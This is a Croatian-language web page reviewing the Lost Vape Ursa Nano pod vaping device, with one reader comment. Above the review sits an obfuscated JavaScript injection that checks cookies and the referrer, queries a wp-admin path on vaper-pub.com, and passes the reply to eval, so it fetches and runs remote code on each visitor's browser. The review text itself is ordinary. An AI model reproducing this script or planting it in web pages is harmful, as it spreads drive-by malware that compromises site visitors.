;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Review: Ursa Nano – Lost Vape

Kad pomislim na naziv Lost Vape, još uvijek prvo pomislim na njihove vrhunske DNA modove. Uostalom, po tome su i najpoznatiji. Ipak, nedavno su se više usredotočili na AIO i POD sustave, a danas ćemo baciti oko na njihov najnoviji POD pod nazivom Ursa Nano.

Nano ima luksuznu estetiku uparen s jedinstvenim sustavom kontrole protoka zraka. U početku sam mislila da je to dugme za uključivanje, ali se pokazalo da je to prekidač protoka zraka. Klizanjem prema dolje osigurava se dodatni protok zraka, a klizanjem prema gore se on zatvara.

Ukratko, Nano je luksuzni pod sustav s unutarnjom baterijom od 800 mAh. Aktivira se povlačenjem i koristi kapsule od 2,5 mL s integriranim zavojnicama. Podovi su trenutno dostupni u verzijama od 0,8Ω i 1,0Ω, a izlazni raspon za Ursa Nano je između 5 i 18 vata.

Sada, idemo detaljnije o Ursa Nano kako bismo shvatili je li to pravi uređaj za vas.

Osnovne značajke:

 • Dimenzije: 100,5 mm x 24,1 mm x 14 mm
 • Težina: 61,3 g
 • Kapacitet tekućine: 2,5 ml
 • Kapacitet baterije: 800 mAh (ugrađena)
 • Napon baterije: 3.0V-4.2V
 • Izlazni napon: 3.0V-3.9V
 • Raspon snage: 5-18W
 • Izlazna struja: 2.5A-5.0A
 • Materijal tijela: legura cinka

Dizajn i kvaliteta izrade

Ursa Nano je nevjerojatno jednostavan za korištenje. Nema gumba, aktivira se povlačenjem. S druge strane nalazi se mali otvor za usis zraka i klizni prekidač.

Uređaj je težak 61,3 grama, što je zapravo prilično teško za POD sustav ovih dana. Ali definitivno se ne čini jeftino! Nano djeluje robusno i ima futuristički dizajn. To je jedan od najotmjenijih vape POD-ova s kojima sam se susrela u zadnje vrijeme. Ursa Nano POD je visok 100,5 mm, širok 24,1 mm i debeo 14 mm.

Osim toga, s jedne strane ima otisnut Lost Vape, a s druge strane Ursa Nano – minimalistički dizajn, ali zato vrlo elegantan.

Tijekom parenja pojavljuje se LED dioda koja označava status vaše baterije. Kada ne parite, ona postaje nevidljiva.

POD-ovi (kapsule)

POD-ovi, odnosno kapsule, imaju integrirane zavojnice i drže 2,5 mL tekućine. Tamne su boje, tako da je prilično teško vidjeti što se događa unutra dok ih ne držite blizu izvora svjetlosti. Čak i kada ih punite, teško je vidjeti jeste li ih napunili do kraja. Nisam ljubitelj toniranih kapsula, ali izgledaju dobro.

Imaju veliku gumenu brtvu koja se lako izvlači i lijepi veliki otvor za punjenje za većinu veličina vrha boca. Na sreću, zadržavaju lijepu količinu tekućine. Nisam primijetila nikakvo curenje i pljuckanje tekućine. Stoga se da zaključiti da su su dobro dizajnirane i izvrsno funkcioniraju s uređajem.

Punjenje kapsula je prilično jednostavno, ali može postati neuredno ako niste oprezni. Na kraju sam većinu vremena morala koristiti salvetu da obrišem višak tekućine. Ne bih rekla da ovo presudan problem, ali ima mjesta za napredak u odjelu punjenja. Samo ih nemojte prepuniti i svakako ih držite pod kutom kako biste vodili tekućinu unutra.

Isti 0.8Ω POD koristim više od tjedan dana i okus se još nije promijenio ni malo, mada će ovo ovisiti i o vrsti tekućine koju koristite. POD-ovi od 1,0Ω su malo bolji s nikotinskim solima, ali su oba su zapravo prilično slična. Protok zraka je isti na oba, ali 0,8Ω s nižim otporom djeluje malo jače. Preko 20ml e-tekućine je do sada prošlo kroz svaki POD i još uvijek daju odličan okus.

Baterija i njeno punjenje

Ursa Nano ima integriranu bateriju od 800 mAh. Punila sam ga svaki drugi dan, ali i ovo će biti individualno i ovisiti o tome koliko dnevno parite.

Nano koristi USB-C punjenje, tako da je prilično brzo. Bilo je potrebno nešto više od sat vremena da se potpuno napuni iz istrošene baterije kada je priključen na prijenosno računalo. To uopće nije loše s obzirom na trajanje baterije od 800 mAh.

Performanse

Svatko može vidjeti da ovaj uređaj super izgleda, ali kako radi?

U pogledu performansi, Ursa Nano je pobjednik. Ima jednako dobar okus kao i bilo koji od boljih vape uređaja koje sam testirala. Naravno, ne možete očekivati DL doživljaj kao sa klasičnim atomizerima, ali to i nije svrha ovog POD-a.

To je jedan od onih jednostavnih i elegantnih vape uređaja koji stanu u svaki džep, a rade jako dobro. Koristila sam Nano sa 70VG 3 mg e-tekućinom i nije bilo nikakvih problema s natapanjem.

Ako ste tip vapera koji traži jak udarac u grlo, vjerojatno bi vam leglo parenje s potpuno zatvorenim protokom zraka i većom koncentracijom nikotina. Ako ste više za manje nikotina, a veće oblake, možete ga otvoriti i on tu postaje RDL.

Sve u svemu, to je prilično svestran uređaj. Jednostavan za korištenje i obavlja posao. Nema se što zamjeriti u smislu izvedbe.

Zaključak

Ovih dana svatko razmišlja o kupovini barem jednog POD uređaja. Ako ste tip vapera koji želi nešto malo luksuznije, Ursa Nano je odličan izbor. Ukratko, postojan je, izgleda sjajno i daje vrlo dobar okus.

Nije bilo pravih nedostataka vezanih za performanse, većina ih je imala veze sa samim dizajnom. Uspjela sam nekoliko puta napuniti Nano, a da nisam ništa prolila, ali trebalo je malo naviknuti se. Također je malo teži od mnogih drugih POD sustava na tržištu, što nije velika stvar, ali nekome može smetati.

Choose your Reaction!
 • Zanimljivo izgleda, a koliko vidim i odlično radi.
  Osobno sam do sada imao doticaja sa nekoliko POD uređaja a to su Voopoo Vinci, Geekvape Frenzy, Uwell Caliburn G i Smok Nord 4.
  Svaki od njih je imao i svoje ono nešto ali i mane.
  Vinciju su poispadali magnetići kojima je svrha držati pod tank na tijelu uređaja, dok na Smok Nord 4 se dogodilo na pod tanku dok je sam uređaj čisto ok.
  Caliburn G je solidan uređaj, tu nema dileme jedino mi malo smetalo što je katkad znao procuriti tank.
  Dok je Frenzy na kraju ispao najbolji POD koji sam koristio.
  Vjerovatno zato što je izdržao 3 mjeseca mojeg svakodnevnog vejpanja na njemu jer je u to vrijeme to bio jedini uređaj koji sam posjedovao.
  A bio je upravo prekretnica na mojem putovanju od okorjelog pušača do Vejpera ;)
  Izdržao bi on zasigurno i duže ali kad sam konačno nabavio moj prvi ozbiljniji mod, Frenzy je završio kod mojeg brata
  i koliko znam još uvijek je ispravan i baterija nije izgubila na kapacitetu.
  Ima nešto u tim POD sustavima…

Leave a Comment